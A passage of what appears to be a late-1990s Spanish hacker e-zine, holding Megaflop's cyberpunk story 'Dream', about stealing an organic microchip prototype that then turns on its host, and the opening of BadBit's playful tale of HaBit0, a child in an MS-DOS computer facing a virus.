'$$$$''....$$$..'$$$$. .$$$$$'' '$$$$$' '$$$. '$$$$. .$$$$$'' '$$$$$$$$$$$$$'' '$$$$. .$$$$$'' '$' '$$$. '$$$$$$$$' '$$$ '$$$$$$$$$$$$'' '$$$$$$$$' '$$$ ' '''' ''''' '' '''''''''''' ''''' '' ' '' ''' ' '' ''' ' [Ascii: VaRf'99] >< >< '-:._.:-' D R E A M '-:._.:-' Megaflop (sniffer@usa.net) (c) 1998-1999 Todos los nombres y lugares son ficticios, cualquier semejanza con la realidad es pura coincidencia. El prototipo de micro que habia logrado extraer de BusTech realmente era tan pequeo como lo habia anticipado Viper, la decima parte del modelo anterior que se habia producido esa semana. BusTech llevaba varios meses intentando desarrollar un esquema eficaz para la deteccion de los micros R9, desde que la nueva generacion de R9 habia surgido en base a tejido organico la deteccion tradicional por rayos X no funcionaba. Los R9 podian implantarse directamente sobre la piel y cumplir su funcion perfectamente, desde unidades de respaldo hasta radiolocalizadores, esa tecnologia permitia confundirse con el tejido receptor sin presentar ningun tipo de rechazo; BusTech originalmente habia puesto en los micros una unidad transmisora de identidad, de este modo se podria llevar un estricto control de los portadores de R9, no tenian previsto que pudiera neutralizarse esta unidad al infectarla controladamente con un virus organico, de este modo la unidad de toma de decisiones tomaria como prioridad la defensa contra dicho virus reduciendo al minimo su consumo de energia y desactivando la unidad transmisora de identidad. Esta informacion se tenia bajo estricto control en los laboratorios de desarrollo de BusTech, y en teoria jamas deberia de haber escapado, sin embargo Viper habia estado trabajando en sus sistemas de comunicaciones por algunos meses y conocia casi perfectamente su protocolo, el R9 era una caja negra antes de la filtracion de informacion, el manual, de varios Gigas tenia capitulos clasificados, supuestamente relacionados con el gobierno y puertas traseras insertadas en su sistema de control, asi habia sido siempre, normas para nivel militar en el nivel civil. La idea de Viper de insertar un virus de manera controlada en el micro habia resultado, ninguno de los sistemas de alarma del edificio de BusTech se habia activado, tener ese micro tan solo unas horas antes de su presentacion oficial era suficiente para que los traders asiaticos replicaran y en algunos casos mejoraran la tecnologia original. El crecimiento exponencial de la creacion de micros generaba nuevas tecnologias en cuestion de semanas, por lo que los fabricantes debian de comercializar su producto en horas o no recuperarian su inversion. Ni Viper ni yo lo haciamos por altruismo, el pago por la intervencion en BusTech era muy jugoso, al mismo tiempo que peligroso, una falla misteriosa en cualquier componente podia ser la causa de nuestra muerte. Al salir de BusTech y entrar al subterraneo senti algo extrao en el R9, segun Viper me habia advertido sentiria al R9 enlazarse con mis celulas despues de reactivar su unidad transmisora de identidad, si antes no moria la unidad por efecto del ataque del virus, para tal efecto habia insertado el R9 debajo de la ua de mi dedo pulgar, y ademas habia sido infectado por Influenza fotosensible, asi al ingresar al subterraneo podria destruir rapidamente al virus. BusTech habia manipulado sus unidades de manera eficiente y muy estable desde la primera generacion de R9, aun asi en algunos extraos casos se habia dado la muerte de algunos huespedes de los micros. Ellos habian sido los primeros en dejar el desarrollo de micros de silicio, de hecho, en un principio BusTech habia sido una farmaceutica multinacional, posteriormente comenzaron a trabajar en cultivos de neuronas y clasificacion y manipulacion de neurotransmisores, y desde entonces habian estado al frente en el desarrollo e investigacion neuronal; los R9 eran el estado del arte. Lomberg GmbH era la compaia que siempre habia permanecido en segundo plano en la industria de los micros neuronales, solamente seguian los pasos de BusTech e implementaban algunas mejoras, sus adelantos habian sido mas bien en los estados de inconsciencia y el sueo, aplicados principalmente a la realidad virtual, las gafas eran cosa del pasado, con un micro de Lomberg era posible experimentar cualquier tipo de sensaciones y pensamientos generados en un rendering organico, vinieron a suplantar a los viejos micros implantados en el nervio optico como parasitos. La electropublicidad de Lomberg era patetica, regalaban micros a gente que no tuviera medios suficientes para pagar, a cambio de inserciones de publicidad transmitida periodicamente desde estaciones globales directamente al cerebro, por sus patrocinadores. En alguna campaa publicitaria se decia que existian mas micros Lomberg que seres humanos en la Tierra. Un hombre de Lomberg esperaba la conexion de Viper para transmitir las especificaciones del R9, yo no me sentia del todo seguro con ese micro espiando mi funcionamiento, la infeccion por la influenza ya habia sido controlada por el R9 y tambien mi organismo habia destruido al virus; el transmisor de identidad comenzaria a funcionar de un momento a otro por lo que Viper se encargaria del resto. Cuando llegue a la oficina de Viper tenia un alimentador generico de entradas y un analizador de protocolos para conectarlos al R9, senti cuando el R9 comenzo a transmitir su localizacion, no habia problema, la oficina estaba aislada, el siguiente paso era mapear todo el micro, insertando datos y checando la salida, finalmente era una caja negra. El resultado inicial de la busqueda fue ilogico, dos mas dos no son 125.3 grados Fahrenheit, al menos no para mi unidad logica. Viper sabia que cada minuto que pasara era menor paga, lo tomamos con calma, intento Viper otra entrada pero el resultado siguio siendo ilogico; localizo el problema, el nuevo prototipo tenia un modo anti-scanning, midiendo tiempos de entradas secuenciales se bloqueaba, este no era una buena seal, no sabiamos cuales eran todas las funciones confidenciales y que decisiones tomaria en cuanto se repitiera un intento de scanning, o si realmente no haria nada, el problema con el R9 es que cuando te lo insertas es parte de ti, habian rumores de que el micro en funciones militares era capaz de desarrollar un crecimiento descontrolado de las celulas en torno al R9, un cancer potenciado. Viper intento infectando de nuevo al micro, error, el R9 ya tenia anticuerpos para el virus, y ademas se encontraba en modo de defensa ya, cualquier otro tipo de intento por desactivarlo y nadie sabria lo que pasaria, BusTech habia programado su micro con sumo cuidado, sabian que podrian neutralizarse sus comunicaciones, por lo que tendria que atacar hacia adentro, al huesped. La gente de Lomberg se estaba desesperando, la velocidad de la luz rige nuestro comercio, a mi me preocupaba mas mi sistema. Viper intento anestesiando localmente, nada, el micro siguio funcionando. La ultima opcion, anestesia general, me quede dormido, soe que viajaba a otro planeta, despues nada... El R9 ataco mi control del sueo, no supe nunca mas si estaba despierto o estaba soando. Megaflop (sniffer@usa.net) >< >< +-------------------------------------------+ | Las Aventuras de HaBit0 | | por BadBit | +-------------------------------------------+ badbit@yahoo.com CAPITULO I -- Introduccion ----------------------------------------------------------------------------- HaBit0 era un nio muy feliz que vivia en alguna computadora con MS-DOS, siempre le gustaba viajar por la estructura de directorios, ver archivos ocultos y andar viendo informacion que el usuario ni siquiera tenia idea que existian. Solo que habia una amenaza para todo el sistema: Un virus mortal. Era un virus muy malo llamado Banano'sBar se introdujo al sistema gracias a un diskette proveniente del primo Pepe que le prestaron al usuario y tenia el juego Mario Bros. Nadie sabia del virus. Asi que un dia los papas de HaBit0 le dijeron que fuera con su abuelita (una version bastante arcaica) a llevarle algunos parches que recientemente habian publicado en una BBS de Luxemburgo. - Te vas por la raiz del disco, ya que en los subdirectorios podria haber virus - Dijo la mama de HaBit0. - Si mami, ya se. - Aunque HaBit0 tenia otras intenciones. Al salir de su directorio se dirijio a la raiz, pero dijo: "Que tal si me voy por el directorio C:\DOS?, nunca he estado ahi y dicen que ahi esta lo mejor de todo el sistema... Lo voy a intentar." Y se cambio al directorio DOS. Con lo que no contaba HaBit0 era que en ese directorio residian la mayor parte de los archivos *.COM que eran los unicos que infectaba Banano'sBar, y como era de suponerse todos estaban infectados. Al pasar HaBit0 por ahi, se puso a ver que hacia cada cosa: - Y tu que haces? - Yo me llamo DISKCOPY.EXE y copio discos - Ah, Y tu como te llamas? - Yo me llamo DELTREE.EXE y soy muy malo, puedo destruir tu directorio de un solo teclazo. - A